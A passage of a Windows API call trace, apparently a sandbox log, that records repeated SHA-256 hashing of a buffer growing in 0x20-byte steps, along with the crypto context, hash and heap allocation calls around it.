	[0102.066] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0102.066] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.066] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245b38
	[0102.066] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245b38, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245b38, pdwDataLen=0x12941c) returned 1
	[0102.066] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.066] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.066] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.066] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.066] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0102.066] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.066] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245b60
	[0102.066] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245b60, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245b60, pdwDataLen=0x12941c) returned 1
	[0102.066] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.066] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.066] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.066] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.066] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0102.067] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.067] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245b88
	[0102.067] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245b88, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245b88, pdwDataLen=0x12941c) returned 1
	[0102.067] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.067] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.067] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.067] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.067] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0102.067] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.067] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245bb0
	[0102.067] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245bb0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245bb0, pdwDataLen=0x12941c) returned 1
	[0102.067] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.067] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.067] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.067] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.067] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0102.067] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.067] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245bd8
	[0102.068] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245bd8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245bd8, pdwDataLen=0x12941c) returned 1
	[0102.068] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.068] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.068] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.068] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.068] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0102.068] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.068] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245c00
	[0102.068] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245c00, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245c00, pdwDataLen=0x12941c) returned 1
	[0102.068] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.068] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.068] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.068] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.068] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0102.068] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.068] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245c28
	[0102.068] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245c28, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245c28, pdwDataLen=0x12941c) returned 1
	[0102.069] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.069] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.069] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.069] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.069] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0102.069] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.069] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245c50
	[0102.069] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245c50, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245c50, pdwDataLen=0x12941c) returned 1
	[0102.069] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.069] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.069] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.069] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.069] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0102.069] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.069] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245c78
	[0102.069] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245c78, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245c78, pdwDataLen=0x12941c) returned 1
	[0102.069] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.070] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.070] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.070] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.070] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0102.070] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245ca0
	[0102.070] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245ca0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245ca0, pdwDataLen=0x12941c) returned 1
	[0102.070] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.070] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.070] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.070] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.070] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0102.070] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245cc8
	[0102.070] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245cc8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245cc8, pdwDataLen=0x12941c) returned 1
	[0102.070] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.070] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.070] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.071] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.071] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0102.071] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.071] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245cf0
	[0102.071] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245cf0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245cf0, pdwDataLen=0x12941c) returned 1
	[0102.071] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.071] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.071] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.071] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.071] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0102.072] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.072] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245d18
	[0102.072] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245d18, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245d18, pdwDataLen=0x12941c) returned 1
	[0102.072] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.072] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.072] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.072] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.072] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0102.072] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.072] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245d40
	[0102.072] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245d40, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245d40, pdwDataLen=0x12941c) returned 1
	[0102.072] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.072] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.072] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.072] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.072] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0102.073] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.073] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245d68
	[0102.073] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245d68, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245d68, pdwDataLen=0x12941c) returned 1
	[0102.073] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.073] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.073] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.073] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.073] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0102.073] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.073] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245d90
	[0102.073] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245d90, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245d90, pdwDataLen=0x12941c) returned 1
	[0102.073] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.073] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.073] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.073] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.073] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0102.073] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.074] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245db8
	[0102.074] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245db8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245db8, pdwDataLen=0x12941c) returned 1
	[0102.074] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.074] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.074] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.074] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.074] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0102.074] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.074] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245de0
	[0102.074] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245de0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245de0, pdwDataLen=0x12941c) returned 1
	[0102.074] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.074] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.074] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.074] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.074] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0102.074] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.074] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245e08
	[0102.075] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245e08, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245e08, pdwDataLen=0x12941c) returned 1
	[0102.075] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.075] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.075] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.075] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.075] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0102.075] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.075] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245e30
	[0102.075] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245e30, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245e30, pdwDataLen=0x12941c) returned 1
	[0102.075] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.075] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.075] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.075] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.075] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0102.075] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.075] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245e58
	[0102.075] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245e58, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245e58, pdwDataLen=0x12941c) returned 1
	[0102.076] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.076] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.076] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.076] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.076] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0102.076] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.076] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245e80
	[0102.076] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245e80, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245e80, pdwDataLen=0x12941c) returned 1
	[0102.076] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.076] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.076] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.077] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.077] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0102.077] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245ea8
	[0102.077] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245ea8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245ea8, pdwDataLen=0x12941c) returned 1
	[0102.077] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.077] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.077] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.077] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.077] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0102.077] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245ed0
	[0102.077] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245ed0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245ed0, pdwDataLen=0x12941c) returned 1
	[0102.077] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.078] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.078] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.078] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.078] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0102.078] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.078] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245ef8
	[0102.078] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245ef8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245ef8, pdwDataLen=0x12941c) returned 1
	[0102.078] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.078] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.078] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.078] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.078] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0102.078] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.078] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245f20
	[0102.078] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245f20, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245f20, pdwDataLen=0x12941c) returned 1
	[0102.078] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.078] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.079] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.079] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.079] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x620, dwFlags=0x0) returned 1
